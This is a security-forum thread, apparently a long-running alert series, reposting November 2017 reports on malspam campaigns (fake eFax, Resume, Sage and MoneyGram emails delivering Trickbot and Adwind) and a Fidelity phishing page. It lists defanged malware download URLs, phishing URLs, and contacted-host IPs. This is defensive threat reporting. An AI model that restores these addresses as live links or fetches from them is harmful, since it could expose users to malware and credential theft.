    FYI...

    Fake 'eFax' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/trick...efax-messages/
    8 Nov 2017 - "... this week the Trickbot gangs have decided to continue with -imitating- eFax to distribute their malware. Unlike yesterday’s version[1] which looked quite realistic. Today’s version is quite a pale imitation...
    1] https://myonlinesecurity.co.uk/fake-...anking-trojan/
    This example is an email containing the subject of 'You have received a fax message' pretending to come from eFax but actually coming from a series of look-a-like domains <noreply@ faxmessage*** .ml> (*** = 1 to 599) with a malicious word doc attachment is the second of today’s spoofs of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...e_8_nov_17.png

    faxmessage*** .ml is being hosted on different IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA. In previous phishing and malware scams by this criminal gang they used a range of domain numbers between 1 and 600 over several days, so there could be a lot more to come.

    efax1298357237174_23536.doc - Current Virus total detections 5/60*. Payload Security**
    This malware doc file downloads using PowerShell from
    http ://transfercar24 .de/xjersey/grondbag.png which of course is -not- an image file but a renamed .exe file that gets renamed to slaaen.exe (VirusTotal 18/67***)
    Alternative download site:
    http ://theartofinvestment .co.uk/authentic/grondbag.png
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...3_2425_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/7...is/1510147039/
    efax1298357237174_23536.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    200.47.70.193
    127.0.0.4
    78.47.139.102
    87.106.3.106

    Contacted Hosts
    87.106.3.106
    78.47.139.102
    82.146.62.66
    92.53.67.5


    *** https://www.virustotal.com/en/file/c...is/1510152607/
    grondbag.png.exe

    transfercar24 .de: 87.106.3.106: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/b8...bbd0/analysis/

    theartofinvestment .co.uk: ... A temporary error occurred during the lookup...
    ___

    Drive-by cryptocurrency mining
    > https://www.helpnetsecurity.com/2017...rrency-mining/
    Nov 8, 2017

    (MANY details at the URL above.)

    Last edited by AplusWebMaster; 2017-11-08 at 23:37.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  9. #1299
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Resume'. 'MoneyGram' SPAM, Fidelity Investments – Phish

    FYI...

    Fake 'Resume' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...liver-malware/
    10 Nov 2017 - "... This is a continuation from these 2 previous posts about malware using resumes or job applications as the lure [1] [2]...
    1] https://myonlinesecurity.co.uk/websi...be-ransomware/
    2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
    ... you can see from the email headers, these pass all authentication checks, so stand quite a good chance of being delivered to a recipient... the web address the word doc downloads from
    http ://89.248.169.136 /bigmac.jpg is exactly the same as reported on 8th October 2107. More than 1 month ago & still live and spewing out malware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...esume_amir.png

    resume.doc - Current Virus total detections 11/59*. Payload Security**...
    This malware downloads from http ://89.248.169.136 /bigmac.jpg which of course it -not- an image file but a renamed .exe ASDlkoa.exe (VirusTotal 18/67[3]) (Payload Security[4])... This word doc looks like this:
    > https://myonlinesecurity.co.uk/wp-co...resume_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/0...is/1510290607/
    resume.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    Hybrid Analysis
    89.248.169.136: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/88...8f9e/analysis/

    3] https://www.virustotal.com/en/file/4...is/1510290556/
    ASDlkoa.exe

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    145.249.104.14
    212.227.91.231

    Contacted Hosts
    212.227.91.231
    145.249.104.14
    104.16.40.2
    216.58.201.228
    216.58.201.238

    ___

    Fake 'MoneyGram' SPAM - Java Adwind delivered
    - https://myonlinesecurity.co.uk/java-...-notice-again/
    10 Nov 2017 - "... mentioned many of these HERE[1]. We have been seeing these sort of emails almost every day and there was nothing much to update. Today’s has a slightly different subject and email content to previous ones. Many Antiviruses on Virus Total normally detect these heuristically...
    1] https://myonlinesecurity.co.uk/?s=java+adwind
    Make Note: JavaAdwind/JavaJacksbot are both very dangerous remote access backdoor Trojans...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-1110_2017.png

    There is -no-attachment- with this malspam campaign, but instead a -link- that activates when you click the image in the email, which downloads
    http ://ferraniguillem .com/MG%20Notice%201110.zip which is NOT a .zip but a .rar file. It will not extract until you -rename- it to rar and then only in WinZip -not- in any other of my extraction tools... eventually extracts to:
    MG Notice 1110.JAR (532kb) Current Virus total detections 15/58*. Payload Security**...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1510301644/
    MG Notice 1110.JAR

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    ferraniguillem .com: 82.98.139.51: https://www.virustotal.com/en/ip-add...1/information/
    > https://www.virustotal.com/en/url/03...b12d/analysis/
    ___

    Fidelity Investments – Phish...
    - https://myonlinesecurity.co.uk/fake-...tice-phishing/
    10 Nov 2017 - "... one we don’t often see in the UK. Fidelity Investments is a US based bank or institution...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...scam-email.png

    If you follow the link-in-the-email
    http ://www.meyvesebze .net/wp-content/plugins/p.php which -redirects- you to
    https ://www.todentists .ca/Site/styles/RtlCust/IdentifyUser/login.php?cmd=login_submit&id=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929&session=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929
    ... you see a webpage looking like this:
    > https://myonlinesecurity.co.uk/wp-co...y_phishing.png

    After you input your User Name and Password, you get forwarded to a page asking for Social security number, Date of Birth, Email Address and Email Password:
    > https://myonlinesecurity.co.uk/wp-co..._phishing2.png

    Then you get a failure page saying “Due to a technical error, the update system is temporarily unavailable. We apologize for the inconvenience. Please try again later”:
    > https://myonlinesecurity.co.uk/wp-co..._phishing3.png

    ... Watch for -any- site that invites you to enter ANY personal or financial information... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... Email Headers and phishing Site information: the From address in the email does-not-exist and is totally made up..."

    meyvesebze .net: 31.186.8.167: https://www.virustotal.com/en/ip-add...7/information/

    todentists .ca: 64.118.86.45: https://www.virustotal.com/en/ip-add...5/information/

    Last edited by AplusWebMaster; 2017-11-10 at 21:27.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #1300
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Sage invoice' SPAM

    FYI...

    Fake 'Sage invoice' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    13 Nov 2017 - "An email with the subject of 'Important: Outdated Invoice' pretending to come from Sage but actually coming from a look-a-like or typo-squatted domain <secure@ sage-invoices .com> with a malicious word doc attachment... delivering Trickbot banking Trojan... Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
    sage-invoices .com hosted on 185.2.81.187 | 213.152.162.139 | 185.106.121.134 |

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ed-invoice.png

    SecureMessage.doc - Current Virus total detections 2/60*. Payload Security**...
    This malware file downloads from
    http ://styleof .co.uk/ser1113.png which of course is -not- an image file but a renamed .exe file that gets renamed to yjgeidqce.exe (VirusTotal 11/66***)
    An alternative download location is
    http ://rifweb .co.uk/ser1113.png
    This email attachment contains a genuine word doc with a macro script that when run will infect you.
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...agepay_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/3...1f92/analysis/
    76SagePay.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    127.0.0.2
    79.171.39.110
    146.255.36.1
    127.0.0.4

    Contacted Hosts
    79.171.39.110
    217.194.212.248
    146.255.36.1
    179.43.160.50
    194.87.238.194
    216.177.130.203


    *** https://www.virustotal.com/en/file/2...is/1510574768/
    ser1113.png

    styleof .co.uk: 79.171.39.110: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/47...bbc8/analysis/

    rifweb .co.uk: 217.194.212.248: https://www.virustotal.com/en/ip-add...8/information/
    > https://www.virustotal.com/en/url/14...3ea5/analysis/

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •